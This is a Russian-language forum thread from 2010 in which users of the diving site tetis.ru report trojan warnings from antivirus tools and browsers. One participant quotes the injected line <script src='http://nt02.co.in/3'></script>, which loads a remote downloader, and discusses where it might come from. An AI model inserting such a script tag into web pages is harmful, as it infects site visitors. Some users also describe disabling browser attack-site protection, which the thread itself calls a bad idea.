Админы, Троян на сайте!

Сообщение

v_Alexey · Добавлено: 25-06-2010 20:05

На Тетисе
Целый день на работе ругался Касперский.
Сейчас Win7 заругалась на опасный сайт.

BK · Добавлено: 26-06-2010 00:21

Видимо, это днём было, т.к. я не видел. Если хотите уменьшить вероятность неприятных последствий, то не логиньтесь в windows под администратором. Если по каким-то причинам не хотите этого делать, то просто уменьшите права программы-браузера (IE, например, или любого другого браузера, каким пользуетесь) которая заходит на сайты. Это будет то же самое, т.е. без разницы, что только одну программу, могущую принести вред, ограничите в привилегиях, что сразу все, в том числе и те, которые вреда принести не могут. В первом случае используйте limited user account, во втором -- Drop my rights хотя бы только для браузера или и для всех других программ, могущих выходить в Интернет. По google найдёте.

v_Alexey · Добавлено: 28-06-2010 16:51

спасибо, мой компьютеры неплохо защищены.

но вот при попытке зайти на tetis.ru

вижу такую вещь

28.06.2010 17:36:15 Обнаружено: HEUR:Trojan.Script.Generic http://nt02.co.in/3

BK · Добавлено: 28-06-2010 21:56

v_Alexey писал(а):28.06.2010 17:36:15 Обнаружено: HEUR:Trojan.Script.Generic nt02.co.in/3

На тетисе, опять же, не видел, но скрипт в Вашей ссылке (видимо, Вы скопировали его со страницы тетиса) интерпретируется Майкрософтом действитвительно как загрузчик трояна:

Код: Выделить всё

TrojanDownloader:JS/Qakbot.D (?) 
Encyclopedia entry
Published: Jun 11, 2010 

Aliases
Not available

Alert Level (?)
Severe 

Antimalware protection details
Microsoft recommends that you download the latest definitions to get protected. 
Detection last updated: 
Definition: 1.85.739.0
Released: Jun 24, 2010   Detection initially created: 
Definition: 1.83.1561.0
Released: Jun 11, 2010  
--------------------------------------------------------------------------------
Summary
This threat is classified as a Trojan - Downloader. A downloader trojan accesses remote websites in an attempt to download and install malicious or potentially unwanted software. Some downloader trojans target specific files on remote websites while others may target a specific URL that points to a website containing exploit code that may allow the site to automatically download and software or malicious code on vulnerable systems. This threat is detected by the Microsoft antivirus engine. Technical details are not currently available.

причем новым, до 11 июня я бы о нём и не мог узнать с помощью MSE.

P.S. А про LUA (limited user account) я написал просто для того, что это дополнительное уменьшение вероятности проблем, в дополнение к уже имеющейся защите. Просто по историческим причинам, не техническому/программистскому, а идеологическому недосмотру MS большинство современных пользователей win по какой-то странной причине, вопреки рекомендациям MS логинится под администратором, тем самым, беспричинно увеличивая вероятность появления проблем.

ShurikK · Добавлено: 30-06-2010 15:29

При переходе по этой ссылке каспер ругается на троян. Ссылка о подводной археологии.
http://www.tetis.ru/?p=archeolog&id=393

BK · Добавлено: 30-06-2010 22:11

Ваш Касперский сработал правильно, т.к. обнаружил следующую строчку в тексте цитируемой Вами страницы, содержащей ссылку на загрузчик вируса Кашпировского:

Код: Выделить всё

<script src='http://nt02.co.in/3'></script>

Это где-то 40-ая строчка по тексту снизу страницы.
Далее возникает вопрос, а откуда вообще такая строчка на этой странице взялась? Возможны 3 варианта, в порядке убывания правдоподобности:
1) Тетис ставит ссылки на разные уважаемые ресурсы, как то Яндекс, Рамблер, ЛайфИнтернет какой-то и т.п. и выдаёт посетителям то, что подставят в данный момент эти ресурсы, без всякого контроля со своей стороны. В частности, поставил ссылку на Индийскую страницу nt02.co.in, а про дайвинг там написано или троян загружается -- это без разницы.
2) Тетис ничего подобного не делает, а всё это за Тетис делает хостер Тетиса.
3) Ни Тетис, ни хостер Тетиса ничего подобного не делают. Ваш компьютер уже заражен вирусом и при посещении страниц Ваш зараженный браузер сам подставляет ссылки для скачивания новых троянов, якобы они пришли от Тетиса.

PraNkiSh · Добавлено: 02-07-2010 11:47

вот что лиса стала выдавать:

Имеется информация о том, что сайт forum.tetis.ru используется для атак на компьютеры пользователей.

Пушистик · Добавлено: 02-07-2010 12:36

PraNkiSh писал(а):вот что лиса стала выдавать:

Имеется информация о том, что сайт forum.tetis.ru используется для атак на компьютеры пользователей.

+1
и гугл хром тоже ругается

Добавлено: 02-07-2010 13:25

Пушистик писал(а):
PraNkiSh писал(а):вот что лиса стала выдавать:

Имеется информация о том, что сайт forum.tetis.ru используется для атак на компьютеры пользователей.
+1
и гугл хром тоже ругается

Такая же беда. Устаешь кликать "игнорировать ".

Добавлено: 02-07-2010 13:55

И самое удивительное, последние пол года не меньше, я мог зайти на тетис через "эксплоуер" только с использованием анонимайзера.
Только что попробовал - нет проблем. Все чудесатее и чудесатее ...
Я обычный пользователь, информация для специалистов.

Lezhkin · Добавлено: 02-07-2010 14:55

C утра начала ругаться и Safari.

daw · Добавлено: 02-07-2010 15:42

И у меня два часа как ругается, с утра проблем не было.

ReedCat · Добавлено: 02-07-2010 16:19

Это кто-то вкатал его в соответствующие списки...

К наличию или отсутствию троянов в конкретный момент это может не иметь отношения.

daw · Добавлено: 02-07-2010 18:20

И что теперь делать? - все время "игнорировать" жать?

ShurikK · Добавлено: 02-07-2010 19:55

Чтобы что-то написать, нужно всё игнорировать.

Это знак не флудить!

Отключил себе в лисе, в "защите", блокирование атакующих сайтов, ибо достало. Однако, плохо это. Администрация сайта ау!

DmitryL · Добавлено: 02-07-2010 21:27

Вот такая вот фигня сегодня весит весь день:

Добавлено: 02-07-2010 21:56

daw писал(а):И что теперь делать? - все время "игнорировать" жать?

Я уже писал, переключился на Эксплоуер. Это только первые пол года я как дурак анонимайзер использовал, чтобы на тетис зайти.
Потом совершенно случайно зашел через Лису и с удивлением обнаружил, что можно на прямую. Поэтому , когда сегодня Лиса дала дуба, с малой толикой надежды зашел по старому. Работает. С чем это связано не знаю. Раньше грешил на администрацию форума, потом думал, что местные военные умничают( из любого другого города Китая кроме Санья выход на Тетис через Эксплоуер был доступен),
теперь новый глюк. Однако он отменил старый. Используя прежний опыт прямой выход на форум решил за 30 минут. (29 минут нажимал игнорировать

)) В очередной раз убеждаюсь, что проблемы с выходом в форум ( создаваемые неизвестными для меня воятелями с неизвестными для меня целями) решаемы. Ну а кто это делает и зачем не моего ума дело. Пока есть возможность решить вопрос не прикладывая особых усилий

vkasper · Добавлено: 02-07-2010 22:32

Опера и Мозила загружать отказываются...странно, но трабл только с сегодняшнего вечера.
Приходиться на сайт входить через IE, что не безопасно для ноута.
Плиз, решите проблемс. Подчистите коды.

Добавлено: 02-07-2010 22:44

ShurikK писал(а):Чтобы что-то написать, нужно всё игнорировать.
Это знак не флудить!

Отключил себе в лисе, в "защите", блокирование атакующих сайтов, ибо достало. Однако, плохо это. Администрация сайта ау!

Как бы было все так просто, да я "Кваку" когда еще жаловался что меня на Тетис не пускают без анонимайзера через Эксплоуер. Модераторы и админы похоже не виноваты.
Еще раз, уважаемые компьютерные специалисты если такие имеются,
если возможно объясните без ваших этих умных цифр и выкладок, кому морду бить. Разумеется в интеллегентном смысле этого слова до пределов, которые понимает любой мыслящий человек , без применения к нему физического воздействия.

daw · Добавлено: 02-07-2010 23:08

Анонимайзер... Лиса...
лучше б сразу для блондинок написали - Мозилла ругается, Эксплорер нет. И впрямь.